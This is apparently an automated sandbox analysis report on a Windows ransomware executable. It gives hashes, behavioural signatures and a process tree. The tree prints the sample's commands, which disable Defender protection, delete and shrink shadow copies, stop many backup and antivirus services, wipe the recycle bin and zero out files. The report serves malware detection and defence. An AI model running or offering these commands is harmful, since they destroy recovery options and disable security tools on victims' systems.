Analysis
-
max time kernel
131s -
max time network
137s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
27-02-2024 00:12
Behavioral task
behavioral1
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win10-20240221-en
Behavioral task
behavioral2
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win10-20240221-en
Behavioral task
behavioral3
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win10-20240221-en
Behavioral task
behavioral4
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win10-20240221-en
General
-
Target
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
-
Size
91KB
-
MD5
be60e389a0108b2871dff12dfbb542ac
-
SHA1
14b4e0bfac64ec0f837f84ab1780ca7ced8d670d
-
SHA256
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d
-
SHA512
6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641
-
SSDEEP
1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (64) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Enumerates connected drives 3 TTPs 14 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 raw.githubusercontent.com 2 raw.githubusercontent.com -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4788 sc.exe 448 sc.exe 3544 sc.exe 836 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1016 vssadmin.exe 2900 vssadmin.exe 2436 vssadmin.exe 1588 vssadmin.exe 1712 vssadmin.exe 2828 vssadmin.exe 3656 vssadmin.exe 1916 vssadmin.exe 2952 vssadmin.exe 4064 vssadmin.exe 4196 vssadmin.exe 4460 vssadmin.exe 1308 vssadmin.exe 1492 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 2116 taskkill.exe 1548 taskkill.exe 3004 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 5840 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6200 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Token: SeDebugPrivilege 3004 taskkill.exe Token: SeDebugPrivilege 1548 taskkill.exe Token: SeDebugPrivilege 2116 taskkill.exe Token: SeDebugPrivilege 4580 powershell.exe Token: SeBackupPrivilege 5800 vssvc.exe Token: SeRestorePrivilege 5800 vssvc.exe Token: SeAuditPrivilege 5800 vssvc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1884 wrote to memory of 4580 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 72 PID 1884 wrote to memory of 4580 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 72 PID 1884 wrote to memory of 4580 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 72 PID 1884 wrote to memory of 4208 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 229 PID 1884 wrote to memory of 4208 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 229 PID 1884 wrote to memory of 4208 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 229 PID 1884 wrote to memory of 4392 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 228 PID 1884 wrote to memory of 4392 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 228 PID 1884 wrote to memory of 4392 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 228 PID 1884 wrote to memory of 5016 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 227 PID 1884 wrote to memory of 5016 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 227 PID 1884 wrote to memory of 5016 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 227 PID 1884 wrote to memory of 824 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 226 PID 1884 wrote to memory of 824 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 226 PID 1884 wrote to memory of 824 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 226 PID 1884 wrote to memory of 4808 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 225 PID 1884 wrote to memory of 4808 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 225 PID 1884 wrote to memory of 4808 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 225 PID 1884 wrote to memory of 4840 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 224 PID 1884 wrote to memory of 4840 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 224 PID 1884 wrote to memory of 4840 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 224 PID 1884 wrote to memory of 1316 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 223 PID 1884 wrote to memory of 1316 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 223 PID 1884 wrote to memory of 1316 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 223 PID 1884 wrote to memory of 4312 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 222 PID 1884 wrote to memory of 4312 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 222 PID 1884 wrote to memory of 4312 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 222 PID 1884 wrote to memory of 4292 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 221 PID 1884 wrote to memory of 4292 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 221 PID 1884 wrote to memory of 4292 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 221 PID 1884 wrote to memory of 4720 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 220 PID 1884 wrote to memory of 4720 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 220 PID 1884 wrote to memory of 4720 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 220 PID 1884 wrote to memory of 4708 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 219 PID 1884 wrote to memory of 4708 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 219 PID 1884 wrote to memory of 4708 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 219 PID 1884 wrote to memory of 2292 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 218 PID 1884 wrote to memory of 2292 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 218 PID 1884 wrote to memory of 2292 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 218 PID 1884 wrote to memory of 5108 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 217 PID 1884 wrote to memory of 5108 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 217 PID 1884 wrote to memory of 5108 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 217 PID 1884 wrote to memory of 168 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 216 PID 1884 wrote to memory of 168 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 216 PID 1884 wrote to memory of 168 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 216 PID 1884 wrote to memory of 1624 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 214 PID 1884 wrote to memory of 1624 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 214 PID 1884 wrote to memory of 1624 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 214 PID 1884 wrote to memory of 1620 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 213 PID 1884 wrote to memory of 1620 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 213 PID 1884 wrote to memory of 1620 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 213 PID 1884 wrote to memory of 2168 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 212 PID 1884 wrote to memory of 2168 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 212 PID 1884 wrote to memory of 2168 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 212 PID 1884 wrote to memory of 2520 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 211 PID 1884 wrote to memory of 2520 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 211 PID 1884 wrote to memory of 2520 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 211 PID 1884 wrote to memory of 2724 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 209 PID 1884 wrote to memory of 2724 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 209 PID 1884 wrote to memory of 2724 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 209 PID 1884 wrote to memory of 2388 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 208 PID 1884 wrote to memory of 2388 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 208 PID 1884 wrote to memory of 2388 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 208 PID 1884 wrote to memory of 372 1884 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe 207 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:2148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:5760
-
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1712
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpFB09.bat2⤵PID:6376
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:4728
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1016
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4064
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2828
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4196
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1916
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2900
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4460
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1308
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2952
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1492
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2436
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3656
-
-
C:\Windows\SysWOW64\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1588
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:4788
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:448
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:3544
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:836
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:4316
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:2428
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:4848
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:1524
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:2752
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:712
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:3448
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:1000
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:4824
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:2392
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:1616
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:3264
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:4804
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:3804
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:372
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2388
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2724
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:2520
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:2168
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:1620
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵PID:1624
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:168
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:5108
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵PID:2292
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:4708
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:4720
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:4292
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:4312
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:1316
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵PID:4840
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:4808
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:824
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵PID:5016
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:4392
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵PID:4208
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
PID:5840
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:4328
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:6200
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe2⤵PID:4592
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:5352
-
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵PID:5300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y1⤵PID:5284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y1⤵PID:5336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y1⤵PID:5516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵PID:5656
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:5632
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:5624
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:5616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:5608
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y1⤵PID:5600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵PID:5592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵PID:5732
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5800
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:5960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y1⤵PID:6020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y1⤵PID:6012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:6084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:6004
-
